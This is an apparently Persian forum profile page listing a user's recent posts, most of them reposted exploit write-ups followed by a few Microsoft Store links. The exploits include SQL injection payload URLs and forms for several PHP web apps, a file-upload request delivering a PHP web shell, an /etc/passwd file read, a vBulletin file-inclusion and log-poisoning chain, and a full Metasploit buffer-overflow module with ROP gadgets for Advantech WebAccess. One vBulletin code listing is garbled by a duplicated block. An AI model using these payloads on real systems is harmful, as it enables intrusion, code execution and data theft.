رفتن به مطلبiran rules jazbe modir
snapphost mahak

mohammad_ghazei

 مدیر بخش
 • تعداد ارسال ها

  331
 • میانگین پستها در طول روز

  1
 • امتیاز

  1,665 
 • تاریخ عضویت

 • آخرین بازدید

 • روز های برد

  1

آخرین بار برد mohammad_ghazei در آبان 26 2017

mohammad_ghazei یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره mohammad_ghazei

 • درجه
  ████▒▒▒▒▒▒ %33

مشخصات کاربر

 • جنسیت
  آقا | Male
 • محل سکونت
  غزه
 1. Hacking

  # # # # # # Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://jbuildozer.com/ # Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ # Version: 1.4.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=[SQL] # # 1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # http://server/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # # # # #
 2. Hacking

  # # # # # # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload # Dork: N/A # Date: 11.12.2017 # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 # Demo: http://vanguard-demo.esy.es/ # Version: 1.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # ..................... # $row = $row->fetch(PDO::FETCH_ASSOC); # $folder_name = $row['id'] * 2; # $folder_name_2 = $folder_name * 5; # $check_dir1 = 'uploads/'.$folder_name; # $check_dir2 = $check_dir.'/'.$folder_name_2; # if (!is_dir($check_dir1)) { mkdir($check_dir1); } # if (!is_dir($check_dir2)) { mkdir($check_dir2); } # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); # $error = 0; # $upload_path = './'; # ..................... # # Proof of Concept: # # Users Add a new product/Add a product preview... # # http://localhost/[PATH]/ # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php # # # # # #
 3. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: [email protected] # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
 4. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
 5. # SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 ## Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. ## Vulnerability details vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=. The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server. **Listing of /index.php:** ``` /* 48 */ $app = vB5_Frontend_Application::init('config.php'); /* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini /* 50 */ //file to catch these situations. /* 51 */ // We report all errors here because we have to make Application Notice free /* 52 */ error_reporting(E_ALL | E_STRICT); /* 53 */ /* 54 */ $config = vB5_Config::instance(); /* 55 */ if (!$config->report_all_php_errors) { /* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4 /* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT)); /* 58 */ } /* 59 */ /* 60 */ $routing = $app->getRouter(); /* 61 */ $method = $routing->getAction(); /* 62 */ $template = $routing->getTemplate(); /* 63 */ $class = $routing->getControllerClass(); /* 64 */ /* 65 */ if (!class_exists($class)) /* 66 */ { /* 67 */ // @todo - this needs a proper error message /* 68 */ die("Couldn't find controller file for $class"); /* 69 */ } /* 70 */ /* 71 */ vB5_Frontend_ExplainQueries::initialize(); /* 72 */ $c = new $class($template); /* 73 */ /* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments()); /* 75 */ /* 76 */ vB5_Frontend_ExplainQueries::finish(); ``` **Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:** ``` /* 15 */ public static function init($configFile) /* 16 */ { /* 17 */ parent::init($configFile); /* 18 */ /* 19 */ self::$instance = new vB5_Frontend_Application(); /* 20 */ self::$instance->router = new vB5_Frontend_Routing(); /* 21 */ self::$instance->router->setRoutes(); /* ... */ ``` We can see that setRoutes() is called: **Listing of /includes/vb5/frontend/routing.php:** ``` /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css') /* 85 */ OR (strtolower(substr($path, -3)) == '.js') ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 91 */ /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* 243 */ /* 244 */ vB5_ApplicationAbstract::checkState(); /* 245 */ /* 246 */ throw new vB5_Exception_404("invalid_page_url"); /* 247 */ } ) ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* … */ ``` So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain ‘/’ char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php: ``` /* 63 */ public function legacy($file) /* 64 */ { /* 65 */ $api = Api_InterfaceAbstract::instance(); /* 66 */ $api->relay($file); /* 67 */ } ``` If we will check relay() from Api_Interface_Collapsed class – /include/api/interface/collapsed.php: ``` /* 117 */ public function relay($file) /* 118 */ { /* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file; /* 120 */ /* 121 */ if ($file AND file_exists($filePath)) /* 122 */ { /* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in /* 124 */ //index.php won't take place. If we better integrate the admincp into the /* 125 */ //frontend, we can (and should) remove this. /* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish')); /* 127 */ require_once($filePath); /* 128 */ } /* ... */ ``` As we could see an attacker is not able to use ‘/’ in the $file so he cannot change current directory on Linux. But for Windows he can use ‘\’ as path delimiter and is able to specify any desired file (he can use ‘\..\’ trick as well) and it will be included by php. ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg) If we want to include file with extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (‘.’) or space (‘%20’) to the filename. ## Proof of Concept We can check if the server is vulnerable by sending the following GET request: ``` /index.php?routestring=.\\ ``` If the response is: ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png) The server is vulnerable. If we want to inject a php code to any file on the server we can use the access.log for example: ``` /?LogINJ_START=<?php phpinfo();?>LogINJ_END ``` After that we can include access.log with our PHP code: ``` /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log ``` ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)
 6. Hacking

  # # # # # # Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ # Demo: http://www.smsemailmarketing.in/demo/videosharing/ # Version: 3.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17649 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability implication allows an attacker to inject html code .... # # Proof of Concept: # # 1) # http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= # # # # # # #
 7. Hacking

  <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
 8. Hacking

  # # # # # # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://piwigo.org/ # Software Link: http://piwigo.org/basics/downloads # Version: <= 2.9.1 # Category: Webapps # Tested on: WiN7_x64/WIN10_X64 # CVE: CVE-2017-10682 # # # # # # Exploit Author: Akityo # Email: [email protected] # # # # # # Description: # # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter # in the comments or status page to cat_options.php. # # # # # # # # Proof-of-Concent: # # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1 # Host: www.test.com # Content-Length: 34 # Cache-Control: max-age=0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 # Upgrade-Insecure-Requests: 1 # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 # Content-Type: application/x-www-form-urlencoded # Accept-Encoding: gzip, deflate # Accept-Language: zh-CN,zh;q=0.8 # Cookie: null # Connection: close # # cat_false%5B%5D=[payload here]&trueify=%C2%AB # # # # # # #
 9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
 10. soft-Windows

  https://www.microsoft.com/en-us/store/p/xodo-pdf-reader-editor/9wzdncrdjxp4
 11. soft-Windows

  https://www.microsoft.com/en-us/store/p/amazon-assistant/9nblggh4vgbl
 12. soft-Windows

  https://www.microsoft.com/en-us/store/p/xbox-accessories/9nblggh30xj3
 13. soft-Windows

  https://www.microsoft.com/en-us/store/p/bridges-in-autumn/9npmk1dkhztl
 14. soft-Windows

  https://www.microsoft.com/en-us/store/p/audiobooks-from-audible/9wzdncrfj1cr
 15. soft-Windows

  https://www.microsoft.com/en-us/store/p/windows-mixed-reality-pc-check/9nzvl19n7cnc
×